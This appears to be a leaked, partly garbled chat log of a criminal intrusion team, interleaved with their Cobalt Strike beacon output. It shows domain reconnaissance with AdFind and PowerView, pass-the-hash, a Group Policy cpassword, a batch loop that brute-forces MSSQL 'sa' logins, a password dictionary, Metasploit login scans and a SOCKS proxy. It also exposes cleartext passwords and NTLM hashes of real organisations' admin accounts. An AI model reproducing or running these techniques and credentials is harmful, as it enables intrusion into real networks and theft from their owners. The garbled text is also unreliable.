\JDOXADCC2.jdossn.local\CtxSTShare -
\JDOXADCC2.jdossn.local\IPC$ - Remote IPC

[+] received output:
\KNDMICEQDB61.jdossn.local\ADMIN$ - Remote Admin
\KNDMICEQDB61.jdossn.local\ASAData -
\KNDMICEQDB61.jdossn.local\ASALogs -
\KNDMICEQDB61.jdossn.local\ASATestData -
\KNDMICEQDB61.jdossn.local\Backups -
\KNDMICEQDB61.jdossn.local\C$ - Default share
\KNDMICEQDB61.jdossn.local\E$ - Default share
\KNDMICEQDB61.jdossn.local\F$ - Default share
\KNDMICEQDB61.jdossn.local\G$ - Default share
\KNDMICEQDB61.jdossn.local\IPC$ - Remote IPC
\KNDMICEQDB61.jdossn.local\L$ - Default share
\KNDMICEQDB61.jdossn.local\M$ - Default share
\KNDMICEQDB61.jdossn.local\MirrorLogs -
\KNDMICEQDB61.jdossn.local\P$ - Default share
\KNDMICEQDB61.jdossn.localSQLRemote -
\KNDMICEQDB61.jdossn.local\T$ - Default share
\KNDMICEQDB61.jdossn.local\Temp -
```pth JDOSSN\nddevbernst 5b622ad5d550408ed6260c2b8fb185cc```
dhsawspilot01.jdossn.local [10.99.194.150]
W088726121943.ndleading.jdossn.local [10.28.92.159]
JDOAWSSUP01.jdossn.local [10.99.207.196]
W08987712192.ndleading.jdossn.local [10.29.220.125]
``````
[+] received output:
\dhsawspilot01.jdossn.local\ADMIN$ - Remote Admin
\dhsawspilot01.jdossn.local\C$ - Default share
\dhsawspilot01.jdossn.local\E$ - Default share
\dhsawspilot01.jdossn.local\IPC$ - Remote IPC

[+] received output:
\W088726121943.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W088726121943.ndleading.jdossn.local\C$ - Default share
\W088726121943.ndleading.jdossn.local\Caseys - Caseys
\W088726121943.ndleading.jdossn.local\D$ - Default share
\W088726121943.ndleading.jdossn.local\IPC$ - Remote IPC
\W088726121943.ndleading.jdossn.local\print$ - Printer Drivers

[+] received output:
\\JDOAWSSUP01.jdossn.local\ADMIN$ - Remote Admin
\JDOAWSSUP01.jdossn.local\C$ - Default share
\JDOAWSSUP01.jdossn.local\D
\JDOAWSSUP01.jdossn.local\D$ - Default share
\JDOAWSSUP01.jdossn.local\E$ - Default share
\JDOAWSSUP01.jdossn.local\IPC$ - Remote IPC

[+] received output:
\W0W8987712192.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W0W8987712192.ndleading.jdossn.local\C$ - Default share
\W0W8987712192.ndleading.jdossn.local\D$ - Default share
\WW08987712192.ndleading.jdossn.local\HP LaserJet Pro MFP M426f-M427f PCL-6 - HP LaserJet Pro MFP M426f-M427f PCL-6
\W0W8987712192.ndleading.jdossn.local\IPC$ - Remote IPC
\WW08987712192.ndleading.jdossn.local\MS Publisher Color Printer - MS Publisher Color Printer
\W0W8987712192.ndleading.jdossn.local\print$ - Printer Drivers
````AdFind -b "OU=NewYork,DC=Contoso,DC=com" -s one -dn`
there's an example belowhttp://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
above from here as in a hurry understood the format DC=server,DC=comkey-b parameter``
shell adfind.exe -f "(objectcategory=person)" -s base > ad_users.txt
``base where do I put it?
C:\Users\Administrator\Desktop\ping>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.

C:\Users\Administrator\Desktop\ping>adfind.exe -f "objectcategory=computer" 1>ad_computers.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.

C:\Users\Administrator\Desktop\ping>adfind.exe -f "(objectcategory=organizationalUnit)" 1>ad_ous.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.

C:\Users\Administrator\Desktop\ping>adfind.exe -subnets -f (objectCategory=subnet) 1>subnets.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.

C:\Users\Administrator\Desktop\ping>adfind.exe -f "(objectcategory=group)" 1>ad_group.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.

C:\Users\Administrator\Desktop\ping>adfind.exe -gcb -sc trustdmp 1>trustdmp.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program
``You still have 4 minutes to google if you don't, google if you specify basea adfain won't work under token I wonder? no password length not lockoutaokay analog of net accounts in powerview how to get it?``The other thing)``

Unicode : @{Unicode=yes}
SystemAccess : @{RequireLogonToChangePassword=0; ForceLogoffWhenHourExpire=0}
KerberosPolicy : @{MaxTicketAge=10; MaxRenewAge=7; MaxServiceAge=600; MaxClockSkew=5;
                  TicketValidateClient=1}
Version : @{signature="$CHICAGO$"; Revision=1}
PrivilegeRights : @{SeBatchLogonRight=System.Object[];
                  SeLoadDriverPrivilege=*S-1-5-21-742535178-4155275036-2790254320-513}
EventAudit : @{AuditDSAccess=1}
RegistryValues :
Path : \\matches.com\sysvol\matches.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\
                  MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
GPOName : {31B2F340-016D-11D2-945F-00C04FB984F9}
GPODisplayName : Domain - Default Domain Policy
````MATCHES\Louisad M@tches2020!!!`
`MATCHES\mercedesd Dinham2323 `in jobs vicito works now made Louise's token, requested DomainPolicy to conf conf8 min for this all-cocken should start.[ ](https://mediaeveryone.com/group/matches?msg=BjGADji9jwnSK3pjt) now doing@tl1 aha, true token domain user tried? authorization vpn goes through radius rather than directly through hell, understand?
you're accessing a pc that DOES NOT KNOW about the domain from the context of a user who is NOT in the domain-seek a way to access with the domain tokens in the fuck - OFFICE - give me another 1000 messages
why the fuck don't you say something?
didn't get it - the office - who got it? no one fucking got it
so write 100,000,000 messages here.
I already explained that to you.
why the fuck do i have to go through this again and explain to you now you can't run it from a domain user because your machine isn't joined to a domain+1''.
[*] 10/03 18:17:46 - Executing PowerView Get-DomainPolicyData via PowerPick
[*] Tasked beacon to run: Get-DomainPolicyData -Domain matches.com (unmanaged)
[+] host called home, sent: 133715 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: "
ERROR: At line:13117 char:24
ERROR: + else { $Results = $GPOSearcher.FindAll() }
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : COMException
ERROR:

``okay, ad_user is shot through powerview fine, why when I shoot DomainPolicy I get ``wrong creeds you have here``?
everything is taken off without the credits, there won't be time to think about it in real objects - in real objects there won't be time to think about the fuck you're talking about
if i don't see guys writing 100 fucking times what to do and the timer goes to minutes, then it's a fucking analytical problem
if there are any questions for me - contact me directlyDiscord takes 5 minutes to postTeamLead1, TeamLead2 - let them all install Discord and share their screens
If they're so smart, they can show you "the goods face" in real time
and everything will be clear, if only because the standard polisy on the reset is 30 minutes, there will be no lockout
ok.
whatever
check it blindlycall it? ...... if you can go to ldap to remove hell through powerview we with grandfather as we check it out through powerview i wrote above that WE ARE NOT IN THE DOMAIN? is hell removed? we are sitting under a wpn it does not work out does it say anything?) net accounts /dombadpasswordcount oxxxxxxx
it's not Blindness from tnt telling the script what's the point of it? when the lockout is near it's skipped of course it's skipped of course
you use the script to check when autobrouting? fuck. is that even a question? we checked three passwords yesterday yes, we have no way to check the lockout policy of the domain
they will not fly into the lock if they check now? the second is to check the LA Credentials data on DIFFERENT groups of servers and APMs - all this is in the AD it makes sense to check it on all domain admins the first thing to do as it is a new pass and it is EXACTLY the technical can try to play with SID play but it is not sure .37 does not stick ``
[-] 10.1.4.4:445 - 10.1.4.4:445 - Failed: '.\Administrator:XhY?8WJSI',
``understood, didn't control user8 that it was brute-force,
how do we know which groups the machine is in?
if we're pulling that from the group policies?
changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
```
this is a clear indication that this is a local user of some PC, and definitely not a service account, I understand that everyone wants to drink beer and have a rest, but let's stop the stupor and productively work off the crumbs of data that are available and not slushkullserver[ ](https://mediaeveryone.com/group/matches?msg=xaeRe2fBZd38i8oFH) . it's not even fucking funny anymore
why test this pass on 1433?
[-] 10.7.20.30:445 - 10.7.20.30:445 - Failed: '.\Administrator:XhY?8WJSI',
```
```
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\Administrator:XhY?8WJSI (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\Administrator:XhY?8WJSI (Incorrect: )
``Guys, we're fucking sysadmins after all.
we're the ones who should understand the logic of group policies.
LA from GPO will be either on specific machines which are in specific groups or on network segments on sid? @tl1 make a correction, check the user and server machines belonging to specific sabnetamplet check the dk, skul and a couple of user pktak that may be everywhere know - this is from group policies
`<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2017-10-27 14:28:20" uid="{C36CFE81-5D6F-444F-981A-E4A0095AEB9F}"><Properties action="U" newName=""" fullName="" description="" cpassword="ZDNIgxXxcpyYuVsI1dItzBw3icVJ2LMHIv2RVOAw1mA" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>`LA where?password for LA XhY?WJSI[ ](https://mediaeveryone.com/group/matches?msg=icgaSNNqbnCtwaMpJ) This is the list of domain comps that the admins have in the balloon40 minutes to google this is longA how long ago did it work?)your task did anyone google it?)it's been 50 minutes)solved?"``
for /f %s in (srv.txt) do @ (echo %s)
```
there should be no error here)))) what do we have?
for /f %s in (srv.txt) do @ (echo %s)
``and so add () for the first loop?
for /f %s in (srv.txt) do @
    for /f %p in (pwd.txt) do @ (osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt)
``Who wrote the batons? ``No, I won't tell you.
It's a mystery, I would pay attention to parentheses) but @tl2 did not tell me where the error is, just my assumption that I should add parentheses somewhere else, all is clear? `%p` - a variable from the dictionary of passwords
do @ osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt
``Where at the end of it you see 2 loops who can write batiks or code in any language but can make queries in the database under the accesses, it does not search itselfYou have 2 dictionaries - srv.txt, pwd.txt I do not think that it was necessary to explain the first one)`-Q matches.com ?[ ](https://mediaeveryone.com/group/matches?msg=NMnPWq9doKJzA9H6s) but if you think about it?
```
beacon> shell osql.exe -U sa
[*] Tasked beacon to run: osql.exe -U sa
[+] host called home, sent: 45 bytes
[+] received output:
Password:
``the question is what to run that everything should be in the same folder right? and just put osql.exe on the dedication and in the same folder with it srv.txt and pwd.txt will form result.txt for a long time?
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:PasswordA (Incorrect: )

[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA (Incorrect: )

``PasswordA€'' looks like a broken symbol.
PasswordA - try ```.
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:navproject123 (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: )
``Check another dictionary from @tl2 with the script.
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:navproject123 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:navproject123 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: )

``Don't forget this for the brute force, the custom skull port means a different thing``.
beacon> portscan 10.10.1.41 61340
[*] Tasked beacon to scan ports 61340 on 10.10.1.41
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.10.1.41' is alive. [read 8 bytes]

[+] received output:
10.10.1.41:61340
Scanner module is complete
``The second one is closed Check 61340 command + output
beacon> portscan 10.10.1.41
[*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 10.10.1.41
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.10.1.41' is alive. [read 8 bytes]
10.10.1.41:5985
10.10.1.41:3389
10.10.1.41:443
10.10.1.41:139
10.10.1.41:135
10.10.1.41:80
10.10.1.41:445
```
```
beacon> portscan 10.7.18.36
[*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 10.7.18.36
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.7.18.36' is alive. [read 8 bytes]
10.7.18.36:5985
10.7.18.36:3389
10.7.18.36:135
10.7.18.36:80
``First and last check what portPassword: navproject123``.
Pinging FORTICLIENTEMS.matches.com [10.10.1.41] with 32 bytes of data:
Reply from 10.10.1.41: bytes=32 time=110ms TTL=121
Reply from 10.10.1.41: bytes=32 time=181ms TTL=121
Reply from 10.10.1.41: bytes=32 time=300ms TTL=121
Reply from 10.10.1.41: bytes=32 time=279ms TTL=121

Ping statistics for 10.10.1.41:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 110ms, Maximum = 300ms, Average = 217ms



Pinging EC2AMAZ-U49LCLF.matches.com [10.1.4.4] with 32 bytes of data:
Reply from 10.1.4.4: bytes=32 time=112ms TTL=121
Reply from 10.1.4.4: bytes=32 time=112ms TTL=121
Reply from 10.1.4.4: bytes=32 time=202ms TTL=121
Reply from 10.1.4.4: bytes=32 time=180ms TTL=121

Ping statistics for 10.1.4.4:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 112ms, Maximum = 202ms, Average = 151ms




Pinging AWS-VPBCSQL03.matches.com [10.5.19.37] with 32 bytes of data:
Reply from 10.5.19.37: bytes=32 time=186ms TTL=121
Reply from 10.5.19.37: bytes=32 time=122ms TTL=121
Reply from 10.5.19.37: bytes=32 time=148ms TTL=121
Reply from 10.5.19.37: bytes=32 time=122ms TTL=121

Ping statistics for 10.5.19.37:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 122ms, Maximum = 186ms, Average = 144ms



Pinging AWS-VTBIMSTRI03.matches.com [10.7.18.36] with 32 bytes of data:
Reply from 10.7.18.36: bytes=32 time=136ms TTL=121
Reply from 10.7.18.36: bytes=32 time=122ms TTL=121
Reply from 10.7.18.36: bytes=32 time=137ms TTL=121
Reply from 10.7.18.36: bytes=32 time=122ms TTL=121

Ping statistics for 10.7.18.36:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 122ms, Maximum = 137ms, Average = 129ms
```

```
(ICMP) Target '10.10.1.41' is alive. [read 8 bytes]

[+] received output:
Scanner module is complete


(ICMP) Target '10.1.4.4' is alive. [read 8 bytes]
10.1.4.4:1433
Scanner module is complete


(ICMP) Target '10.5.19.37' is alive. [read 8 bytes]
10.5.19.37:1433
Scanner module is complete


[+] received output:
(ICMP) Target '10.7.18.36' is alive. [read 8 bytes]

[+] received output:
Scanner module is complete
````MSSQLSvc.matches.com [204.74.99.100]`CREATE LOGIN [Abby] WITH PASSWORD=N'abbyabby', DEFAULT_DATABASE=[master],[ ](https://mediaeveryone.com/group/matches?msg=WHrvRc9wXZ5vuZfsf) yes "SysConnStr"="company=Carpetright UK;server=CSONAVQA01;dbname=CSONAVQA01;user=repl_ho;passwd=admin;|fin|ndbcs@370 "skul ports by the way are listed in the AD again - read the conclusion you like to be more secretive and unnecessarily drop files on the disk, but it makes a lot of noise traffic) for the future - when you scan for anything, check the port you need to check is hardly there dhcp certainlyotping skul again?```
Unable to Connect: )
``at least I saw myself why didn't you scan it?
(ICMP) Target '10.1.4.4' is alive. [read 8 bytes]
10.1.4.4:1433
Scanner module is complete
```

```
(ICMP) Target '10.7.18.36' is alive. [read 8 bytes]

[+] received output:
Scanner module is complete
```

```
beacon> portscan 10.7.19.25 1433
[*] Tasked beacon to scan ports 1433 on 10.7.19.25
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
``And more, please send me the port scans to all 3 servers, it was not in the rockyou?
for /f %s in (srv.txt) do @ (for /f %p in (pwd.txt) do @ osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt)
```
something like this is possible
but there is a mistake somewhere in this command ;- )The dumbest thing on the skulbrut is this above ```
1
123
1234
12345
123456
1234567
12345678
123456789
1234567890
sa
sasa
sqlsa
sqladmin
sqladmin1
sa1
s@dmin
P455w0rd
p455w0rd
p455word
p455wOrd
P455word
P455wOrd
P4ssw0rd
p4ssw0rd
p4sSw0rd
p4Ssw0rd
P4ssword
p4ssword
p4sswOrd
P4sswOrd
P@55w0rd
p@55w0rd
p@55word
P@55word
p@55wOrd
P@55wOrd
pa55w0rd
pa55w0rd
pa55word
Pa55word
Passw0rd
passw0rd
PasswOrd
Password
password
PaSsWoRd
PASSword
PASSWORD
passwOrd
pa$w0rd
pa$word
P@ssw0rd
p@ssw0rd
p@sSw0rd
p@Ssw0rd
P@ssword
p@ssword
p@sswOrd
P@sswOrd
P@$w0rd
p@$w0rd
p@$$word
p@$wOrd
P@$word
P@$wOrd
P455w0rd1
p455w0rd1
p455word1
p455wOrd1
P455word1
P455wOrd1
P4ssw0rd1
p4ssw0rd1
p4sSw0rd1
p4Ssw0rd1
P4ssword1
p4ssword1
p4sswOrd1
P4sswOrd1
P@55w0rd1
p@55w0rd1
p@55word1
P@55word1
p@55wOrd1
P@55wOrd1
pa55w0rd1
Pa55w0rd1
pa55word1
Pa55word1
Passw0rd1
passw0rd1
PasswOrd1
Password1
password1
PaSsWoRd1
PASSword1
PASSWORD1
passwOrd1
pa$w0rd1
pa$word1
P@ssw0rd1
p@ssw0rd1
p@sSw0rd1
p@Ssw0rd1
P@ssword1
p@ssword1
p@sswOrd1
P@sswOrd1
P@$w0rd1
p@$w0rd1
p@$word1
p@$wOrd1
P@$word1
P@$wOrd1
``````
[*] 10.7.19.25:1433 - 10.7.19.25:1433 - MSSQL - Starting authentication scanner.
[*] 10.7.18.36:1433 - 10.7.18.36:1433 - MSSQL - Starting authentication scanner.
[*] 10.1.4.4:1433 - 10.1.4.4:1433 - MSSQL - Starting authentication scanner.
[-] 10.1.4.4:1433 - Unable to parse encryption req during pre-login, this may not be a MSSQL server
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: )
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Unable to Connect: )
[*] Scanned 3 of 3 hosts (100% complete)
exploit -j
[*] Auxiliary module running as background job 1.
msf6 auxiliary(scanner/mssql/mssql_login) >
[*] 10.7.19.25:1433 - 10.7.19.25:1433 - MSSQL - Starting authentication scanner.
[*] 10.1.4.4:1433 - 10.1.4.4:1433 - MSSQL - Starting authentication scanner.
[*] 10.7.18.36:1433 - 10.7.18.36:1433 - MSSQL - Starting authentication scanner.
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect:)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Unable to Connect: )
[*] Scanned 3 of 3 hosts (100% complete)
exploit -j
[*] Auxiliary module running as background job 2.
msf6 auxiliary(scanner/mssql/mssql_login)
[*] 10.7.19.25:1433 - 10.7.19.25:1433 - MSSQL - Starting authentication scanner.
[*] 10.1.4.4:1433 - 10.1.4.4:1433 - MSSQL - Starting authentication scanner.
[*] 10.7.18.36:1433 - 10.7.18.36:1433 - MSSQL - Starting authentication scanner.
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect:)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Unable to Connect: )
[*] Scanned 2 of 3 hosts (66% complete)
[*] Scanned 3 of 3 hosts (100% complete)


``All 3 servers? all failedPassword$
PasswordA€ pw08
PasswordA€
pw08I also recommend to build your own brute force dictionary for the future, which are not tied to domain, year and server namePassword$ PasswordA€ pw08setg Proxies socks4:104.238.205.128:2282checkablethere is an excellent)in hashes look[ ](https://mediaeveryone.com/group/matches?msg=Af9FsrNjnoLdqp8dG) where is it from?[ ](https://mediaeveryone.com/group/matches?msg=Ht6pTTvpaofN7oE4B) .sa sapw08;@user1 hasn't removed the hash?+sleep + highlighted in yellowSleep good morning and you can all go home and dump that available@user3 session in the coba highlight where the file I'll take samsession in slipriyou get I in the coba uploadsSanja sleep you in the coba uploads? Only you at work? I mean, my productivity will be 50% less because I get up at 8 in the morning. And it will be good if only mine.You know what it would be if grandma had a bolt.But if I had archived ...In 4 hours already get up)I know the smaller the date comes out - the better = )
saiglobal.com\adm.bisfra0 aad3b435b51404eeaad3b435b51404ee:6778ead5a63d0e8da0a2235147af85a0
saiglobal.com\adm.brodan0 aad3b435b51404eeaad3b435b51404ee:06290576382001cd1da4c942e9fa0ca6
saiglobal.com\adm.brodav1 aad3b435b51404eeaad3b435b51404ee:4f1ef28113c7375b22d3f31bd294fa4e
saiglobal.com\adm.damben0 aad3b435b51404eeaad3b435b51404ee:dd9507d8ad5d23af29f99fdbe979d72a
saiglobal.com\adm.evamar1 aad3b435b51404eeaad3b435b51404ee:65a8bca59e4205fc94ed31e11f78d4ac
saiglobal.com\adm.kalnic0 aad3b435b51404eeaad3b435b51404ee:d9c4c5a3dca649913994767d6276b9f9
saiglobal.com\adm.turime0 aad3b435b51404eeaad3b435b51404ee:2a0974987cad16892cf57c3f3646e1ea
saig.frd.global\svc.sccmcliinst aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67

``We are in no hurry ;`` Then you delete everything after you drop1 eh file into the system, archive it and compress it 577 times in the internet)) there is no archiver in the archive? brrr, it takes about 100mdump waiting to be loaded? no@user3 finished with the dump?golden words, i wholeheartedly support:thinking:let's take it into account and do it differently in the future:face_with_monocle:but in the creds it was necessary to put exactly "short" variant so it happened because yes and EA were needed before getting the session on trustee originally wanted to do so, but then I thought "why the fuck then to get them through addind" and decided that "but maybe it is necessary" and that's how the list of "doc, ea, ok future, I see you from ad users delivered yes and other things, next time in creds.txt just output net group "domain admins" and all)if anything you can from my he said that he has everything sortedMisha leave c360? well for all that worked today report, Misha finalized c360[ 